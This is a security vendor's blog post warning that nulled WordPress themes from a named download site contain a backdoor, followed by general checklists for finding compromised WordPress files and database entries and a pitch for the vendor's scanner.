The subject is pretty familiar for most of the WordPress developers and people who maintain the websites. Everyone who takes their website security seriously will honor the advice but there are still some people who wish to take short-cuts and install nulled themes and plugins. Such people are not saving money to add more modules to their website, rather opening a remote website management option to the hacker.

We have added some articles before about such websites which you should not relay to download the plugins or themes. Today I am going to talk about another such website, which is “freewordpresthemes [dot] com”. They are offering a few WordPress themes which you can download free from their website and they are packed with Malware inside. We found them during our regular inspection through the reported malware by our scanner engine. So the cPGuard scanner engine already protects you from the particular malware injected into their package.

So now let us take a look into the actual injection in their package. We found the below injected code in their “functions.php” file which is actually referring to a TXT file in their website.

The injected code actually pulls some code from their website, creates a new file under the public space of the website, adds some code to it which is the remote hand for the hackers.

So what does that mean? Yes, installing and enabling this theme means you have opened up your website to an anonymous person who can make changes to your website without permission.

So how can you escape from such threats? There is only one answer to that…download the themes and plugins from reliable sources. You should be ready to pay for the software that is going to serve your requirements or you should find some alternate options instead of opting for such short-cuts. Even though there are numerous incidents and reports around there regarding such issues, people who do not act wisely will end up in such troubles. 

You can also deploy security solutions like cPGuard on your server to protect you from such threats. But ultimately it is not recommended to use any nulled software if security matters! 

WordPress always the hot choice of website hackers and thus it is one of the web applications that receive major attacks. Especially on a shared web hosting server, it is very much interesting to check and compare the WordPress websites logs against the other websites on the same server. The result will be pretty self-explanatory in most cases, where you can see a ton of brute-force attempts, generic attacks like and targeted attacks to exploit the WordPress websites. The rate of attack attempts will be much higher for WordPress websites compared to the other web apps.

Where you can find the infections 

There are many methods to exploit WordPress websites and new types of attacks/vulnerabilities are being reported as time goes on. You can often find the infected code in  a WordPress website in 

1. The File System where you physically store the Website Files
2. The database associated with the website

 In both the above cases, the hackers will add some external code to execute their logic and thus exploit the compromised website. 

1. How to find hacked WordPress Files

The hacker targets the files and tries to update/upload the file contents with the malicious code many times. Many times they target the plugins, themes, or the uploads directory but it is not limited to the specific directories. When you can a manual lookup, you can start with the following steps

• Check the DocumentRoot of the website and ensure that there are no unknown files/folders there. Especially if you find any unknown folders or files ( with gibberish names ) you should check them specifically
• Check the wp-content/plugins directory and make sure that there is no plugin directory exists that is not installed by you. Also, search for the latest updated PHP files under the plugins folder and verify the list
• Check the wp-content/themes directory and make sure that there is no themes directory exists that is not installed by you. Also, search for the latest updated PHP files under the themes folder and verify the list
• Ensure that no PHP or other interpreted files are uploaded to the wp-content/uploads folder. This folder is specifically to store media files and thus not supposed to execute any code from it.
• Use wp-cli tool to check the integrity of the core and plugins files. You can refer this link to know how to use it
• You can use any WordPress security plugins like Wordfence to scan and find any other hidden hacked files under the website. 

1. How to find hacked WordPress Database contents

This is more tricky compared to finding the compromised files as it needs more manual effort to track the injected code from the database. It is advised to take a backup of the present database before any changes on your website database. To start with the investigation, you can do the following

• Check WordPress admin user list and make sure that the list does not contain unknown users
• Take a dump of the database and search for suspicious content (i.e., spammy keywords, links) that you found abusive in your website
• Check the post contents and take note of any kind of JS injections
  
• Take a look into the wp_options table and ensure that there are no unexpected entries there.

As I mentioned already, this needs some kind of expertise and if you do not know how to do this please look for an expert hand to do this for you. 

How to automate these checks for your website?

The search for malicious code in your files and database is not an easy task and doing it regularly is not an easy task. If you own a single website, what you can do is to depend on a security plugin or a Cloud solution to scan your website regularly and report any bad files. Also you can choose a hosting platform that has automatic virus checks enabled ( cPGuard does it along with WAF protection specifically for WordPress websites ) which can protect your website without any additional installation and cost. If you are a server owner, it is essential to install an anti-virus to protect your customer websites from such attacks and save your server reputation.

cPGuard contains built-in tools to protect your WordPress websites and the WAF module has explicit rules to stop attacks towards WordPress website/components. Our distributed network helps us to detect latest attack attempts, keep the software up to date and to defend the latest WordPress attacks.